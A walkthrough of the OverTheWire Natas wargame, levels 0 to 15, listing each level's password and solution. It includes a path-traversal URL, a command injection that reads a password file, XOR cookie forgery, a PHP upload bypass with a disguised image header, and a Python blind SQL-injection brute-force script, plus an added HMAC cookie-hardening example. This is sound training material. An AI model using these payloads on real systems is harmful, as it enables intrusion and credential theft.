Wargame – Natas 0-15 Walkthrough
Level 0
URL: http://natas0.natas.labs.overthewire.org
Username/password: natas0/natas0
View the HTML source comments.

Level 1

Level 2

Follow the path to the files directory.

Open user.txt.

Level 3

Even Google cannot find it, which means crawlers are restricted; check the robots.txt file.

Visit that path; it contains a users.txt.

natas4:Z9tkRkWmpt9Qr7XrR5jWRkgOU901swEZ
Level 4

Change the Referer header to the required link.

Access granted. The password for natas5 is iX6IOfmpN7AYOQGPwtn3fXpbaJVJcHfq
Level 5

Set the loggedin cookie to 1.

Access granted. The password for natas6 is aGoY4q2Dc6MgDq4oL4YtoKtyAg9PeHa1
Level 6
Follow the include path and fetch the secret.inc file.


Access granted. The password for natas7 is 7z3hEENjQtflzgnT29q7wAvMNfZdh0i9
Level 7

File (path) inclusion vulnerability:
http://natas7.natas.labs.overthewire.org/index.php?page=../../../../etc/natas_webpass/natas8
DBfUBfqQG69KvJvJ1iAbMoIpwSNQ9bWe
Level 8

Reverse the secret computation:
hex2bin(3d3d516343746d4d6d6c315669563362) = "==QcCtmMml1ViV3b"
strrev("==QcCtmMml1ViV3b") = "b3ViV1lmMmtCcQ=="
base64_decode("b3ViV1lmMmtCcQ==") = "oubWYf2kBq"
Access granted. The password for natas9 is W0mMhUcRRnG8dcghE4qvk3JA9lGt8nDl
Level 9

passthru() runs an external command, and user input is concatenated into it: command injection.

Read the natas10 password directly: ; cat /etc/natas_webpass/natas10

nOpp1igQAkUzaI1GUUjzn1bFVj7xCNzu
Level 10

Some characters are filtered; use .* with the cat command to read the file.

U82q5TCMMQ9xuFoI3dYX61s7OZD9JKoK
Level 11
From the PHP and JS code:

    $defaultdata = array( "showpassword"=>"no", "bgcolor"=>"#ffffff");

    function xor_encrypt($in) {
        $key = '<censored>';
        $text = $in;
        $outText = '';
        // Iterate through each character
        for($i=0;$i<strlen($text);$i++) {
            $outText .= $text[$i] ^ $key[$i % strlen($key)];
        }
        return $outText;
    }

    function loadData($def) {
        global $_COOKIE;
        $mydata = $def;
        if(array_key_exists("data", $_COOKIE)) {
            $tempdata = json_decode(xor_encrypt(base64_decode($_COOKIE["data"])), true);
            if(is_array($tempdata) && array_key_exists("showpassword", $tempdata) && array_key_exists("bgcolor", $tempdata)) {
                if (preg_match('/^#(?:[a-f\d]{6})$/i', $tempdata['bgcolor'])) {
                    $mydata['showpassword'] = $tempdata['showpassword'];
                    $mydata['bgcolor'] = $tempdata['bgcolor'];
                }
            }
        }
        return $mydata;
    }

    function saveData($d) {
        setcookie("data", base64_encode(xor_encrypt(json_encode($d))));
    }

    $data = loadData($defaultdata);
    if(array_key_exists("bgcolor",$_REQUEST)) {
        if (preg_match('/^#(?:[a-f\d]{6})$/i', $_REQUEST['bgcolor'])) {
            $data['bgcolor'] = $_REQUEST['bgcolor'];
        }
    }
    saveData($data);
    ?>
    <h1>natas11</h1>
    <div id="content">
    <body style="background: <?=$data['bgcolor']?>;">
    Cookies are protected with XOR encryption<br/><br/>
    <?
    if($data["showpassword"] == "yes") {
        print "The password for natas12 is <censored><br>";
    }
    ?>

We need to find the key value and set showpassword=yes.
The data given is showpassword=no and bgcolor=#ffffff.
The data value lives in the cookie; the current cookie value is
ClVLIh4ASCsCBE8lAxMacFMZV2hdVVotEhhUJQNVAmhSEV4sFxFeaAw=
Reversing the algorithm gives the key: XOR is symmetric, so XORing the decoded cookie with the known plaintext JSON yields the key stream.

    <?php
    $origData = base64_decode("ClVLIh4ASCsCBE8lAxMacFMZV2hdVVotEhhUJQNVAmhSEV4sFxFeaAw=");
    // The known plaintext is used in place of the key
    $key = '{"showpassword":"no","bgcolor":"#ffffff"}';
    $outText = "";
    for ($i = 0; $i < strlen($origData); $i++) {
        $outText .= $origData[$i] ^ $key[$i % strlen($key)];
    }
    echo $outText;
    ?>

Running it prints the repeating key stream qw8Jqw8J..., so key = qw8J.
Now compute the cookie value for showpassword=yes.
Write out the algorithm:

    <?php
    function xor_encrypt($in) {
        $key = 'qw8J';
        $text = $in;
        $outText = '';
        // Iterate through each character
        for($i=0;$i<strlen($text);$i++) {
            $outText .= $text[$i] ^ $key[$i % strlen($key)];
        }
        return $outText;
    }
    echo base64_encode(xor_encrypt('{"showpassword":"yes","bgcolor":"#ffffff"}'));
    ?>

Running it gives
ClVLIh4ASCsCBE8lAxMacFMOXTlTWxooFhRXJh4FGnBTVF4sFxFeLFMK
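As an added example (not part of the original write-up), the key recovery above done generically in Python, with a period check so it works for any repeating key, followed by an HMAC-authenticated cookie of the kind that would have made this forgery detectable; the server secret and the seal/unseal design are assumptions of this example, not natas code.

```python
import base64
import hashlib
import hmac
import json
import secrets
from typing import Optional

# Constructed inputs: the cookie and default JSON quoted in the natas11 notes above.
COOKIE = "ClVLIh4ASCsCBE8lAxMacFMZV2hdVVotEhhUJQNVAmhSEV4sFxFeaAw="
DEFAULT_JSON = '{"showpassword":"no","bgcolor":"#ffffff"}'


def xor_bytes(data: bytes, key: bytes) -> bytes:
    """Repeating-key XOR, the same operation as the PHP xor_encrypt()."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def recover_key(cookie_b64: str, known_plaintext: str) -> bytes:
    """Ciphertext XOR known plaintext yields the key stream; shrink it to its period.

    This is why a fixed XOR key is not encryption: one known cookie leaks the key.
    """
    stream = xor_bytes(base64.b64decode(cookie_b64), known_plaintext.encode())
    for period in range(1, len(stream) + 1):
        if all(stream[i] == stream[i % period] for i in range(len(stream))):
            return stream[:period]
    return stream


# Hardened alternative (assumed design, not natas code): authenticate the cookie
# with an HMAC so a client cannot change showpassword without the server secret.
SERVER_SECRET = secrets.token_bytes(32)  # constructed; never leaves the server


def seal(data: dict, secret: bytes = SERVER_SECRET) -> str:
    """Encode the JSON and append a SHA-256 HMAC tag over the encoded body."""
    body = base64.b64encode(json.dumps(data, sort_keys=True).encode()).decode()
    tag = hmac.new(secret, body.encode(), hashlib.sha256).hexdigest()
    return f"{body}.{tag}"


def unseal(cookie: str, secret: bytes = SERVER_SECRET) -> Optional[dict]:
    """Return the cookie's data only if its tag verifies; None means tampered."""
    body, _, tag = cookie.rpartition(".")
    expected = hmac.new(secret, body.encode(), hashlib.sha256).hexdigest()
    if not hmac.compare_digest(tag, expected):
        return None
    return json.loads(base64.b64decode(body))
```

Note that the HMAC only detects modification; if the cookie contents must also stay confidential, authenticated encryption (for example AES-GCM) is the right tool.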
Set the cookie value in the browser console.


EDXp0pS26wLKHZy1rDBPUZk0RKfLGIR3
Level 12
Upload a PHP file, intercept the request, and change the jpg extension to php.


Click the PHP link; the PHP code runs and reveals the password.
jmLTY0qiPZBbaKc9341cqPQZBJv7MQbY
Level 13

Simply changing the file extension no longer works.

Open the file in WinHex and craft an image-disguised PHP file by writing the JPEG file header FFD8FFE0 at the start.

Intercept the request, change the extension to php, and the upload succeeds; the PHP path can then be accessed.
Lg96M10TdfaPyVBkJdjymbllQ5L6qdl1
Level 14
$query = "SELECT * from users where username=\"".$_REQUEST["username"]."\" and password=\"".$_REQUEST["password"]."\"";
The classic universal-password injection works: " or "1"="1


AwWj0w5cvxrZiONgZ9J5stNVkmxdk39J
Level 15
Boolean-based blind SQL injection: use a search-style LIKE BINARY injection to brute-force the password character by character.

    import requests
    import string

    url = "http://natas15:AwWj0w5cvxrZiONgZ9J5stNVkmxdk39J@natas15.natas.labs.overthewire.org/"
    characters = ''.join([string.ascii_letters, string.digits])
    existsStr = 'This user exists.'

    # First pass: find which characters occur anywhere in the password
    strs = ''
    for i in characters:
        r = requests.get(url + '?username=natas16" AND password LIKE BINARY "%' + i + '%" "')
        if existsStr in r.text:
            strs += i
    print(strs)
    # strs = 'acehijmnpqtwBEHINORW03569'

    # Second pass: extend the known prefix one character at a time (32-char password)
    password = ''
    for i in range(32):
        for c in strs:
            r = requests.get(url + '?username=natas16" AND password LIKE BINARY "' + password + c + '%" "')
            if existsStr in r.text:
                password += c
                print("Password: ", password)
                break

Running sqlmap in boolean-based blind mode also recovers the natas16 password.

